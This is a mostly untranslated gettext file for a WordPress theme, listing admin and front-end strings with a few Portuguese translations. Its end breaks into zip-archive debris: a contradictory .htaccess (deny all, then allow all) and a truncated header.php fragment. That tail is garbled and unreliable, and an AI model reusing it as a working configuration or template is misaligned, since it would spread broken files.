msgid "" "The remote plugin package does not contain a folder with the desired slug " "and renaming did not work." msgstr "" #: backend/panels/single-post.php:1169 msgid "The Score (1 > 10)" msgstr "" #: includes/sidebars.php:165 msgid "" "The section at the bottom of the single post content. It usually uses to " "display adverts or the post related shortcode." msgstr "" #: includes/sidebars.php:156 msgid "" "The section at the top of the single post content. It usually uses to " "display adverts" msgstr "" #: backend/panels/design.php:575 msgid "The setting below applies to the post title and hyperlinks." msgstr "" #: backend/panels/design.php:593 msgid "The setting below applies to top level menu items." msgstr "" #: backend/panels/single-post.php:1542 msgid "The setting below will apply to the single post pages." msgstr "" #: backend/panels/blog-pages.php:366 backend/panels/blog-pages.php:853 #: backend/panels/blog-pages.php:1267 backend/panels/blog-pages.php:1675 #: backend/panels/blog-pages.php:2167 msgid "" "The setting will not apply if the selected blog layout does not support the " "selected entry category." msgstr "" #: backend/panels/single-post.php:1268 msgid "" "The setting will not apply to posts have been added shortcode directly into " "content." msgstr "" #: backend/panels/blog-pages.php:590 msgid "The settings below apply the blog page." msgstr "" #: backend/panels/typography.php:637 msgid "The settings below apply to all button on your website." msgstr "" #: backend/panels/typography.php:36 msgid "" "The settings below apply to almost post and page content on your website." msgstr "" #: backend/panels/header-style.php:263 msgid "The settings below apply to the \"Transparent Header 1,2 and 3\"." msgstr "" #: backend/panels/blog-pages.php:2377 msgid "The settings below apply to the 404 page." msgstr "" #: backend/panels/blog-pages.php:1066 msgid "The settings below apply to the author pages." msgstr "" #: backend/panels/typography.php:854 msgid "The settings below apply to the breadcrumb bar." msgstr "" #: backend/panels/header-style.php:18 msgid "The settings below apply to the header style 1, 2 and 3." msgstr "" #: backend/panels/header-style.php:312 msgid "The settings below apply to the header style 4." msgstr "" #: backend/panels/header-style.php:563 msgid "The settings below apply to the header style 5." msgstr "" #: backend/panels/typography.php:594 msgid "" "The settings below apply to the input and textarea form on your website." msgstr "" #: backend/panels/header.php:309 msgid "The settings below apply to the mobile header." msgstr "" #: backend/panels/blog-pages.php:1888 msgid "The settings below apply to the search page." msgstr "" #: backend/panels/page.php:18 msgid "The settings below apply to the single page." msgstr "" #: backend/single-metaboxes.php:300 msgid "" "The settings below apply to the standard post format. Using the " "corresponding panel if you select another post format for this post." msgstr "" #: backend/panels/blog-pages.php:1481 msgid "The settings below apply to the tags and other archive pages." msgstr "" #: backend/panels/logo.php:31 msgid "The settings below apply to whole your website." msgstr "" #: backend/panels/ads.php:174 backend/panels/ads.php:363 msgid "" "The settings below will apply if you choose the \"Custom Image\" ad type." msgstr "" #: backend/panels/ads.php:117 backend/panels/ads.php:306 msgid "The settings below will apply if you choose the \"Script\" ad type." msgstr "" #: backend/panels/blog-pages.php:197 backend/panels/blog-pages.php:245 #: backend/panels/blog-pages.php:299 backend/panels/blog-pages.php:342 #: backend/panels/blog-pages.php:542 backend/panels/blog-pages.php:732 #: backend/panels/blog-pages.php:786 backend/panels/blog-pages.php:829 #: backend/panels/blog-pages.php:1030 backend/panels/blog-pages.php:1146 #: backend/panels/blog-pages.php:1200 backend/panels/blog-pages.php:1243 #: backend/panels/blog-pages.php:1443 backend/panels/blog-pages.php:1554 #: backend/panels/blog-pages.php:1608 backend/panels/blog-pages.php:1651 #: backend/panels/blog-pages.php:1851 backend/panels/blog-pages.php:2046 #: backend/panels/blog-pages.php:2100 backend/panels/blog-pages.php:2143 msgid "" "The settings below will be not available if you use \"Global WP Query " "Template Shortcode\" to build the blog listing." msgstr "" #: backend/category-settings.php:19 msgid "" "The settings below will override on the default settings in \"Theme Options >" " Category\"." msgstr "" #: templates/popup.php:108 msgid "" "The short code is incorrect or empty form. Please check the setting again!" msgstr "" #: backend/panels/typography.php:699 msgid "" "The single headline will use H1 font settings as the default. You can " "override the settings in this panel." msgstr "" #: backend/panels/typography.php:756 msgid "" "The single tagline will use the H2 tag font settings. You can override " "settings in this panel." msgstr "" #: backend/panels/design.php:667 msgid "" "The small border style in featured images and other element whole the " "website." msgstr "" #: backend/panels/single-post.php:1168 msgid "The Star (1 > 5)" msgstr "" #: includes/sidebars.php:87 msgid "The submenu section when hovering on the more button." msgstr "" #: backend/panels/blog-pages.php:198 msgid "" "The theme supports heading dynamic content, Please read the documentation " "for further information." msgstr "" #: backend/panels/breadcrumb.php:16 msgid "" "The theme supports Navxt plugin Yoast SEO and Rank Math SEO breadcrumbs." msgstr "" #: backend/panels/optimized.php:82 msgid "" "The theme will load default fonts to render some elements as heading tags, " "body, meta." msgstr "" #: backend/panels/blog-pages.php:343 backend/panels/blog-pages.php:830 #: backend/panels/blog-pages.php:1244 backend/panels/blog-pages.php:1652 #: backend/panels/blog-pages.php:2144 backend/panels/bookmark.php:244 #: backend/panels/bookmark.php:692 msgid "" "The theme will use \"Standard Blog Design\" settings to render block. You " "can override settings in the panel below." msgstr "" #: backend/single-metaboxes.php:886 msgid "" "The transparent headers is only suitable for layouts: Standard 2, Standard 5," " Video 2 and Audio 2." msgstr "" #: backend/panels/single-post.php:1558 msgid "" "The transparent headers is only suitable with layouts: Standard 2, Video 2 " "and Audio 2." msgstr "" #: backend/single-metaboxes.php:109 msgid "" "The transparent headers is only suitable with the page has a sliders or wide " "image at the top." msgstr "" #: backend/panels/design.php:16 msgid "Theme Design" msgstr "" #: backend/theme-options.php:240 backend/theme-options.php:241 msgid "Theme Options" msgstr "" #: backend/class-tgm-plugin-activation.php:408 msgid "" "There are one or more required or recommended plugins to install, update or " "activate." msgstr "" #: backend/class-tgm-plugin-activation.php:366 #, php-format msgid "There is an update available for: %1$s." msgstr "" #: backend/panels/blog-pages.php:19 msgid "" "These are global category settings. The settings below will apply to all " "category pages." msgstr "" #: backend/panels/block-grid.php:515 msgid "" "These are settings for the boxed grid 1. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-grid.php:702 msgid "" "These are settings for the boxed grid 2. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-list.php:366 msgid "" "These are settings for the boxed list 1. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-list.php:561 msgid "" "These are settings for the boxed list 2. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-classic.php:20 msgid "" "These are settings for the Classic (standard) layout. It will be overridden " "by the \"Block Design\" (for Elementor pages) and \"Blog Design\" (for the " "Blog and Archive pages)." msgstr "" #: backend/panels/block-grid.php:20 msgid "" "These are settings for the Grid 1 (standard). It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-grid.php:185 msgid "" "These are settings for the grid 2 layout. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)." msgstr "" #: backend/panels/block-list.php:20 msgid "" "These are settings for the list 1 (standard) layout. It will be overridden " "by the \"Block Design\" (for Elementor pages) and \"Blog Design\" (for the " "Blog and Archive pages)." msgstr "" #: backend/panels/block-list.php:193 msgid "" "These are settings for the list 2. It will be overridden by the \"Block " "Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and Archive " "pages)." msgstr "" #: backend/panels/block-grid.php:350 msgid "" "These are settings for the small grid layout. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and " "Archive pages)" msgstr "" #: backend/panels/design.php:90 msgid "" "These are small elements that display in the post listing ie: author name, " "date, total views, total comments..." msgstr "" #: backend/panels/breadcrumb.php:24 msgid "" "These settings below require to activate Navxt plugin Yoast SEO and Rank " "Math SEO breadcrumbs in order to work." msgstr "" #: bookmark/bookmark.php:174 msgid "This article has been added to reading list" msgstr "" #: bookmark/bookmark.php:190 msgid "This article was removed from reading list" msgstr "" #: bookmark/bookmark.php:209 msgid "This article was removed from your bookmark" msgstr "" #: templates/parts.php:116 #, php-format msgid "" "This block requests at least %s posts, Please add new posts for this query " "or change the block settings: " msgstr "" #: backend/panels/optimized.php:254 msgid "" "This image is used if the post/page being shared does not contain featured " "images." msgstr "" #: backend/panels/single-post.php:1233 msgid "This is a global option to disable all comments on posts & page..." msgstr "" #: backend/panels/sidebar.php:28 msgid "" "This is the global option and will be overridden by individual \"Sidebar " "Position\" settings." msgstr "" #: backend/single-metaboxes.php:284 msgid "" "This option is useful in case you would like to create a custom entry meta." msgstr "" #: backend/panels/newsletter.php:105 msgid "" "This option use for \"Scroll Distance\" mode. Input a distance value (px) " "when visitor scrolling down to show the popup." msgstr "" #: backend/panels/newsletter.php:112 msgid "" "This option use for \"Time Delay\" mode. Input a delay time (ms) value to " "show the popup after the site loaded." msgstr "" #: backend/panels/design.php:329 msgid "" "This option will help you optimize the site speed or increase image quality " "on your website." msgstr "" #: backend/class-tgm-plugin-activation.php:615 msgid "This plugin needs to be updated to be compatible with your theme." msgstr "" #: backend/panels/ads.php:86 msgid "" "This section supports ads in the top header website. For other ad spots, " "please read the theme documentation for further info." msgstr "" #: backend/panels/ads.php:274 msgid "" "This section supports ads inside single post content, after x paragraphs. " "For other ad spots, please read the theme documentation for further info." msgstr "" #: backend/panels/header.php:639 msgid "" "This section will show a small alert or event at the bottom of the " "navigation." msgstr "" #: backend/panels/header.php:264 msgid "This section will show the user bookmark list and latest blog listing." msgstr "" #: backend/panels/header.php:620 msgid "This setting apply to the logout button in the logged user dropdown." msgstr "" #: backend/panels/header.php:61 msgid "" "This setting requires to set \"Use Ruby Template\" in the setting above in " "order to work." msgstr "" #: backend/panels/color.php:125 backend/panels/color.php:142 msgid "This setting will apply to the default mode." msgstr "" #: backend/panels/blog-pages.php:155 msgid "" "This setting will be overridden by \"Global WP Query Template Shortcode\" in " "the individual category setting panel." msgstr "" #: backend/panels/blog-pages.php:121 msgid "" "This setting will be overridden by \"template shortcode\" in the individual " "category setting panel." msgstr "" #: backend/panels/table-contents.php:150 msgid "This setting will not apply to the full width 2 columns layout." msgstr "" #: backend/panels/single-post.php:499 msgid "" "This setting will only apply on the desktop devices. Navigate to " "\"Typography > Entry Category\" to set for tablet mobile devices." msgstr "" #: backend/panels/blog-pages.php:179 backend/panels/blog-pages.php:715 #: backend/panels/blog-pages.php:1130 msgid "" "This setting will override on \"Dashboard > Settings > Reading > Blog pages " "show at most\" setting. It also apply to the \"Global WP Query Template " "Shortcode\"." msgstr "" #: backend/mega-menu.php:198 msgid "This setting will override on above settings." msgstr "" #: backend/panels/blog-pages.php:62 backend/panels/blog-pages.php:628 #: backend/panels/blog-pages.php:1946 msgid "" "This setting will override on the \"Header Style\" setting, Leave it blank " "if you would like to use the \"Header Style\" setting." msgstr "" #: backend/panels/blog-pages.php:47 backend/panels/blog-pages.php:613 #: backend/panels/blog-pages.php:1931 msgid "" "This setting will override on the setting in the header panel. It will not " "apply to the header style 4." msgstr "" #: backend/class-tgm-plugin-activation.php:354 #, php-format msgid "This theme recommends the following plugin: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:348 #, php-format msgid "This theme requires the following plugin: %1$s." msgstr "" #: backend/panels/newsletter.php:97 msgid "Time Delay" msgstr "" #: backend/panels/adblock.php:26 backend/panels/newsletter.php:34 msgid "Title" msgstr "" #: backend/category-settings.php:433 backend/panels/block-classic.php:120 #: backend/panels/block-grid.php:120 backend/panels/block-grid.php:285 #: backend/panels/block-grid.php:450 backend/panels/block-grid.php:623 #: backend/panels/block-grid.php:810 backend/panels/block-list.php:128 #: backend/panels/block-list.php:301 backend/panels/block-list.php:482 #: backend/panels/block-list.php:677 backend/panels/blog-pages.php:460 #: backend/panels/blog-pages.php:947 backend/panels/blog-pages.php:1361 #: backend/panels/blog-pages.php:1769 backend/panels/blog-pages.php:2261 #: backend/panels/bookmark.php:359 backend/panels/bookmark.php:807 msgid "Title HTML Tag" msgstr "" #: backend/class-tgm-plugin-activation.php:2494 #, php-format msgid "To Activate (%s)" msgstr "" #: backend/panels/header.php:121 msgid "" "To add column widgets, navigate to \"Dashboard > Appearance > Widgets > More " "Menu Section\". Please read the documentation for further information." msgstr "" #: backend/panels/footer.php:92 msgid "To add content, please navigate to Appearance > Widgets." msgstr "" #: backend/panels/logo.php:39 msgid "" "To add the favicon, navigate to \"Appearance > Customize > Site Identity > " "Site Icon\". Please read the documentation for further information." msgstr "" #: backend/panels/design.php:40 msgid "" "To edit color for individual category, navigate to \"Admin Dashboard > Posts " "> Categories > Edit\"." msgstr "" #: backend/panels/blog-pages.php:25 msgid "" "To edit for individual category, navigate to \"Admin Dashboard > Posts > " "Categories > Edit\"." msgstr "" #: backend/panels/single-post.php:1550 msgid "" "To edit for individual post, navigate to \"Posts > Edit > Post Options > " "Site Header\"." msgstr "" #: backend/panels/heading.php:29 msgid "" "To edit the heading typography, navigate to \"Typography > Block Heading\"." msgstr "" #: backend/panels/header.php:182 msgid "" "To edit the placeholder text of the search form, navigate to \"Theme Options " "> General > Search Placeholder\"." msgstr "" #: backend/panels/single-post.php:524 msgid "" "To edit the tagline typography, navigate to \"Typography > Headline & " "Tagline > Single Tagline\"." msgstr "" #: backend/panels/header.php:315 msgid "" "To edit the typography, navigate to \"Typography > Menu > Mobile Menu " "Settings\". Navigate to \"Social Profiles\" for the social list." msgstr "" #: backend/panels/sidebar.php:21 msgid "" "To edit the widget heading layout, navigate to \"Heading Design > Sidebar " "Widget Heading\"." msgstr "" #: backend/class-tgm-plugin-activation.php:2486 #, php-format msgid "To Install (%s)" msgstr "" #: backend/panels/amp.php:132 msgid "" "To setup the copyright area, Please navigate to Footer > Copyright Section." msgstr "" #: backend/panels/single-post.php:1260 msgid "" "To use the shortcode, read the documentation \"Related Box Shortcode\" for " "further information." msgstr "" #: backend/panels/header.php:203 msgid "Toggle Mode" msgstr "" #: backend/panels/general.php:17 msgid "Tooltips" msgstr "" #: backend/configs.php:376 msgid "Top" msgstr "" #: backend/panels/blog-pages.php:643 msgid "Top & Bottom Area Template Builder" msgstr "" #: backend/panels/header-style.php:618 msgid "Top & Bottom Border" msgstr "" #: backend/configs.php:377 msgid "Top (Big Icon)" msgstr "" #: backend/panels/amp.php:420 msgid "Top - Ad Type" msgstr "" #: backend/panels/amp.php:448 msgid "Top - Adsense Size" msgstr "" #: backend/panels/amp.php:460 msgid "Top - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:432 msgid "Top - Data Ad Client" msgstr "" #: backend/panels/amp.php:440 msgid "Top - Data Ad Slot" msgstr "" #: backend/category-settings.php:129 backend/panels/blog-pages.php:649 msgid "Top Area Template Shortcode" msgstr "" #: backend/panels/footer.php:53 msgid "Top Border" msgstr "" #: backend/single-metaboxes.php:681 msgid "Top Entry Widgets Area" msgstr "" #: includes/menu.php:302 msgid "Top News" msgstr "" #: backend/panels/single-post.php:706 msgid "Top Share Bar" msgstr "" #: backend/panels/amp.php:414 msgid "Top Single Content Ad Settings" msgstr "" #: backend/panels/ads.php:77 backend/panels/privacy.php:25 msgid "Top Site" msgstr "" #: backend/single-metaboxes.php:142 backend/single-metaboxes.php:919 msgid "Top Site Advert" msgstr "" #: backend/category-settings.php:124 backend/panels/blog-pages.php:114 msgid "Top Template Builder" msgstr "" #: backend/panels/woocommerce.php:147 msgid "Total Related Products" msgstr "" #: backend/configs.php:80 msgid "Transparent - Style 1" msgstr "" #: backend/configs.php:81 msgid "Transparent - Style 2" msgstr "" #: backend/configs.php:82 msgid "Transparent - Style 3" msgstr "" #: backend/panels/header-style.php:262 msgid "Transparent Colors" msgstr "" #: backend/panels/logo.php:125 msgid "Transparent Logo" msgstr "" #: backend/panels/logo.php:115 msgid "Transparent Logos" msgstr "" #: backend/panels/logo.php:133 msgid "Transparent Retina Logo" msgstr "" #: backend/panels/header.php:547 msgid "Trigger Button Layout" msgstr "" #: backend/panels/single-post.php:768 backend/panels/single-post.php:907 #: backend/panels/single-post.php:1045 backend/panels/single-post.php:1673 #: templates/parts.php:609 msgid "Tumblr" msgstr "" #: backend/panels/socials.php:68 msgid "Tumblr URL " msgstr "" #: backend/panels/single-post.php:732 backend/panels/single-post.php:871 #: backend/panels/single-post.php:1009 backend/panels/single-post.php:1641 #: templates/parts.php:594 msgid "Twitter" msgstr "" #: backend/panels/socials.php:35 msgid "Twitter URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2643 msgid "Type" msgstr "" #: backend/panels/typography.php:13 msgid "Typography" msgstr "" #: backend/panels/single-post.php:245 msgid "Underline Color" msgstr "" #: bookmark/bookmark.php:57 msgid "Undo" msgstr "" #: templates/parts.php:803 msgid "Unfollow" msgstr "" #: backend/class-tgm-plugin-activation.php:2576 msgid "unknown" msgstr "" #: backend/panels/sidebar.php:37 msgid "Unlimited Sidebars" msgstr "" #: backend/class-tgm-plugin-activation.php:2817 msgid "Update" msgstr "" #: backend/configs.php:408 backend/panels/design.php:274 msgid "update (Last Updated)" msgstr "atualização (última atualização)" #: backend/class-tgm-plugin-activation.php:2702 #, php-format msgid "Update %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:2490 #, php-format msgid "Update Available (%s)" msgstr "" #: backend/class-tgm-plugin-activation.php:2427 msgid "Update recommended" msgstr "" #: backend/class-tgm-plugin-activation.php:616 msgid "Update Required" msgstr "" #: templates/single/templates.php:456 msgid "Updated" msgstr "Atualizado" #: backend/panels/design.php:117 msgid "Updated Date Icon" msgstr "" #: backend/class-tgm-plugin-activation.php:3592 #, php-format msgid "Updating Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:344 #, php-format msgid "Updating Plugin: %s" msgstr "" #: backend/class-tgm-plugin-activation.php:2778 msgid "Upgrade message from the plugin author:" msgstr "" #: backend/single-metaboxes.php:535 msgid "Upload a background header image for this review section." msgstr "" #: backend/panels/blog-pages.php:1983 msgid "Upload a background image for the search header in the dark mode." msgstr "" #: backend/panels/blog-pages.php:1969 msgid "Upload a background image for the search header." msgstr "" #: backend/panels/blog-pages.php:2399 msgid "Upload a header image for the 404 page in the dark mode." msgstr "" #: backend/panels/blog-pages.php:2391 msgid "Upload a header image for the 404 page." msgstr "" #: backend/panels/bookmark.php:129 backend/panels/bookmark.php:472 msgid "Upload a image for displaying at the top heading in the dark mode." msgstr "" #: backend/panels/bookmark.php:121 backend/panels/bookmark.php:464 msgid "Upload a image for displaying at the top heading. Image height is 60px." msgstr "" #: backend/panels/logo.php:126 msgid "" "Upload a light logo for transparent headers. Recommended logo height value " "is 60px, allowed extensions are .jpg, .png and .gif." msgstr "" #: backend/panels/logo.php:104 msgid "" "Upload a light retina logo for displaying in mobile device. It should be " "same dimensions with the mobile logo." msgstr "" #: backend/panels/logo.php:134 msgid "" "Upload a light retina logo for transparent headers. Recommended logo height " "value is 120px." msgstr "" #: backend/panels/logo.php:96 msgid "" "Upload a logo for the mobile device. Recommended logo height value is 84px, " "allowed extensions are .jpg, .png and .gif" msgstr "" #: backend/panels/footer.php:153 msgid "" "Upload a small dark logo to display at bottom of the footer in the dark mode." msgstr "" #: backend/panels/footer.php:145 msgid "Upload a small logo to display at bottom of the footer." msgstr "" #: backend/panels/amp.php:92 msgid "Upload AMP footer logo." msgstr "" #: backend/category-settings.php:87 msgid "Upload featured images (maximum: 2 images) for this category." msgstr "" #: backend/single-metaboxes.php:433 msgid "Upload Gallery" msgstr "" #: backend/panels/logo.php:160 msgid "" "Upload icon for the Apple touch (72 x 72px), allowed extensions are .jpg, ." "png, .gif" msgstr "" #: backend/panels/logo.php:168 msgid "" "Upload icon for the Metro interface (144 x 144px), allowed extensions are ." "jpg, .png, .gif" msgstr "" #: backend/single-metaboxes.php:643 msgid "" "Upload the sponsor light logo for this post, recommended height for the logo " "is 52px." msgstr "" #: backend/single-metaboxes.php:637 msgid "" "Upload the sponsor logo for this post, recommended height for the logo is " "52px." msgstr "" #: backend/panels/ads.php:187 backend/panels/ads.php:376 msgid "Upload your ad image in the dark mode." msgstr "" #: backend/panels/ads.php:180 backend/panels/ads.php:369 msgid "Upload your ad image." msgstr "" #: backend/single-metaboxes.php:399 msgid "Upload your audio file, support: mp3, ogg, wma, m4a, wav files." msgstr "" #: backend/panels/login.php:67 msgid "Upload your background for the logo screen." msgstr "" #: backend/single-metaboxes.php:434 msgid "Upload your images for this gallery." msgstr "" #: backend/panels/login.php:52 msgid "" "Upload your logo for the logo screen. This option will override on wordpress " "logo." msgstr "" #: backend/single-metaboxes.php:339 msgid "" "Upload your preview video. Keep video short and lightweight as possible to " "save server bandwidth." msgstr "" #: backend/single-metaboxes.php:351 msgid "Upload your video file, support: mp4, m4v, webm, ogv, wmv, flv files." msgstr "" #: backend/panels/ads.php:124 backend/panels/ads.php:313 msgid "Use Adsense units code to ensure it display exactly where you put." msgstr "" #: backend/configs.php:359 msgid "Use Custom" msgstr "" #: backend/category-settings.php:105 backend/panels/blog-pages.php:1225 #: backend/panels/breadcrumb.php:54 backend/panels/breadcrumb.php:65 #: backend/panels/breadcrumb.php:76 backend/panels/breadcrumb.php:87 #: backend/panels/breadcrumb.php:98 backend/panels/page.php:85 #: backend/panels/single-post.php:452 msgid "Use Global Setting" msgstr "" #: backend/configs.php:223 msgid "Use Post Excerpt" msgstr "" #: backend/configs.php:86 backend/panels/footer.php:98 msgid "Use Ruby Template" msgstr "" #: backend/panels/header-style.php:114 backend/panels/header-style.php:402 #: backend/panels/header-style.php:439 backend/panels/header-style.php:669 #: backend/panels/header.php:410 msgid "use the option \"To\" to set a gradient background." msgstr "" #: backend/configs.php:224 msgid "Use Title Tagline" msgstr "" #: backend/panels/sidebar.php:49 msgid "" "Useful when a sidebar is too tall or too short compared to the rest of the " "content." msgstr "" #: backend/panels/header.php:609 msgid "User Dashboard Menu" msgstr "" #: backend/panels/bookmark.php:438 msgid "User Interests" msgstr "" #: backend/panels/single-post.php:1175 backend/panels/single-post.php:1219 #: backend/single-metaboxes.php:483 msgid "User Rating in Comments" msgstr "" #: backend/panels/reaction.php:16 backend/single-metaboxes.php:839 msgid "User Reaction" msgstr "" #: templates/single/reviews.php:242 msgid "User Votes" msgstr "" #: backend/class-tgm-plugin-activation.php:2647 msgid "Version" msgstr "" #: backend/configs.php:849 msgid "Vertical Banner (120 x 240)" msgstr "" #: templates/single/review-comment.php:94 msgid "Very Poor" msgstr "" #: backend/panels/single-post.php:312 msgid "Via Bar" msgstr "" #: backend/single-metaboxes.php:799 msgid "Via Name" msgstr "" #: backend/single-metaboxes.php:804 msgid "Via URL" msgstr "" #: templates/single/templates.php:701 msgid "VIA:" msgstr "Via:" #: backend/single-metaboxes.php:316 msgid "Video Format" msgstr "" #: backend/panels/design.php:477 msgid "Video Icon" msgstr "" #: backend/panels/design.php:498 msgid "Video Icon Color" msgstr "" #: backend/single-metaboxes.php:322 msgid "Video Layout" msgstr "" #: backend/panels/single-post.php:60 msgid "Video Post Format Layout" msgstr "" #: backend/panels/single-post.php:66 msgid "Video Post Layout" msgstr "" #: backend/single-metaboxes.php:331 msgid "Video URL" msgstr "" #: backend/configs.php:406 backend/panels/design.php:272 msgid "view (Post Views)" msgstr "" #: templates/header/templates.php:905 msgid "View Cart" msgstr "" #: templates/parts.php:636 msgid "Vimeo" msgstr "" #: backend/panels/socials.php:122 msgid "Vimeo URL " msgstr "" #: backend/panels/single-post.php:786 backend/panels/single-post.php:925 #: backend/panels/single-post.php:1063 backend/panels/single-post.php:1689 #: templates/parts.php:642 msgid "Vkontakte" msgstr "" #: backend/panels/socials.php:134 msgid "VKontakte URL " msgstr "" #: templates/single/reviews.php:245 msgid "vote" msgstr "" #: templates/single/reviews.php:247 msgid "votes" msgstr "" #: backend/panels/general.php:56 msgid "" "We recommend you should create a backup before updating or major changes." msgstr "" #: backend/panels/optimized.php:21 #, php-format msgid "" "We recommend you to refer this " "DOCUMENTATION to optimize for you website" msgstr "" #: templates/parts.php:588 msgid "Website" msgstr "" #: backend/panels/typography.php:27 msgid "Website Body" msgstr "" #: backend/panels/header.php:560 msgid "Welcome Back!" msgstr "" #: templates/single/templates.php:753 msgid "What do you think?" msgstr "O que você acha?" #: backend/panels/single-post.php:1348 msgid "What posts should be displayed in the related section." msgstr "" #: backend/panels/single-post.php:750 backend/panels/single-post.php:889 #: backend/panels/single-post.php:1027 backend/panels/single-post.php:1657 #: templates/parts.php:648 msgid "WhatsApp" msgstr "" #: backend/panels/socials.php:146 msgid "Whatsapp URL " msgstr "" #: backend/category-settings.php:418 backend/panels/block-classic.php:99 #: backend/panels/block-grid.php:99 backend/panels/block-grid.php:264 #: backend/panels/block-grid.php:429 backend/panels/block-grid.php:602 #: backend/panels/block-grid.php:789 backend/panels/block-list.php:107 #: backend/panels/block-list.php:280 backend/panels/block-list.php:461 #: backend/panels/block-list.php:656 backend/panels/blog-pages.php:444 #: backend/panels/blog-pages.php:931 backend/panels/blog-pages.php:1345 #: backend/panels/blog-pages.php:1753 backend/panels/blog-pages.php:2245 #: backend/panels/bookmark.php:343 backend/panels/bookmark.php:791 msgid "" "When you select \"use title tagline\". if it is empty, it will fallback to " "the post excerpt or content." msgstr "" #: backend/category-settings.php:417 backend/panels/block-classic.php:98 #: backend/panels/block-grid.php:98 backend/panels/block-grid.php:263 #: backend/panels/block-grid.php:428 backend/panels/block-grid.php:601 #: backend/panels/block-grid.php:788 backend/panels/block-list.php:106 #: backend/panels/block-list.php:279 backend/panels/block-list.php:460 #: backend/panels/block-list.php:655 backend/panels/blog-pages.php:443 #: backend/panels/blog-pages.php:930 backend/panels/blog-pages.php:1344 #: backend/panels/blog-pages.php:1752 backend/panels/blog-pages.php:2244 #: backend/panels/bookmark.php:342 backend/panels/bookmark.php:790 msgid "Where to get the post excerpt." msgstr "" #: backend/configs.php:847 msgid "Wide Skyscraper (160x600)" msgstr "" #: backend/panels/sidebar.php:55 msgid "Widget Block Editor" msgstr "" #: backend/panels/heading.php:112 msgid "Widget Heading HTML Tag" msgstr "" #: backend/panels/heading.php:95 msgid "Widget Heading Layout" msgstr "" #: backend/panels/footer.php:113 msgid "Widget Menu Font Size" msgstr "" #: backend/panels/single-post.php:165 msgid "Width Settings" msgstr "" #: backend/panels/reaction.php:48 msgid "Wink" msgstr "" #: backend/panels/woocommerce.php:28 msgid "WooCommerce" msgstr "" #: backend/panels/woocommerce.php:44 msgid "WooCommerce Pages" msgstr "" #: backend/panels/woocommerce.php:15 msgid "" "Woocommerce plugin not found! Please install and active Woocommerce to active settings " "below." msgstr "" #: backend/class-tgm-plugin-activation.php:2386 msgid "WordPress Repository" msgstr "" #: backend/panels/design.php:354 msgid "" "WordPress will crop uploaded images to ensure your website use the best " "image size for the blog layouts." msgstr "" #: backend/panels/design.php:165 msgid "Words per Minute" msgstr "" #: backend/panels/header-style.php:60 backend/panels/header-style.php:354 #: backend/panels/header-style.php:606 msgid "Wrapper (1240px)" msgstr "" #: backend/panels/optimized.php:91 msgid "Write CSS to file to reduce CPU usage and reduce the load time." msgstr "" #: backend/panels/heading.php:23 msgid "" "You can also choose layouts and colors for individual heading the page " "builder." msgstr "" #: backend/panels/typography.php:84 msgid "" "You can control the excerpt font sizes in this panel. The font family and " "other font values will base on \"Body Font\" values." msgstr "" #: backend/panels/dark-mode.php:24 msgid "" "You can set custom dark mode background in \"Global Colors > Dark Mode " "Background\"." msgstr "" #: bookmark/templates.php:60 msgid "You haven't saved anything yet." msgstr "" #: templates/single/footer.php:50 msgid "You Might Also Like" msgstr "Você pode gostar também" #: backend/panels/bookmark.php:113 msgid "you'll find all saved articles here." msgstr "" #: templates/ajax.php:128 msgid "You've reached the end of the list!" msgstr "" #: backend/panels/bookmark.php:449 msgid "Your Categories" msgstr "" #: templates/single/review-comment.php:97 msgid "Your comment" msgstr "" #: templates/single/review-comment.php:63 msgid "Your Email" msgstr "Seu email" #: includes/actions.php:47 msgid "Your email" msgstr "Seu email" #: includes/actions.php:44 templates/single/review-comment.php:57 msgid "Your name" msgstr "Seu nome" #: templates/single/review-comment.php:87 msgid "Your Rating" msgstr "" #: templates/single/templates.php:942 msgid "Your review is awaiting moderation." msgstr "" #: templates/single/templates.php:944 msgid "" "Your review is awaiting moderation. This is a preview, your review will be " "visible after it has been approved." msgstr "" #: includes/actions.php:51 msgid "Your Website" msgstr "Seu site" #: templates/single/review-comment.php:69 msgid "Your website" msgstr "Seu site" #: templates/parts.php:597 msgid "YouTube" msgstr "" #: backend/panels/socials.php:42 msgid "Youtube URL " msgstr "" #: backend/panels/newsletter.php:57 msgid "Zero spam, Unsubscribe at any time." msgstr "" PK!.|languages/.htaccessnu[ Order allow,deny Deny from all Order allow,deny Allow from all RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PK!1 header.phpnu[ > data-theme="dark"> >
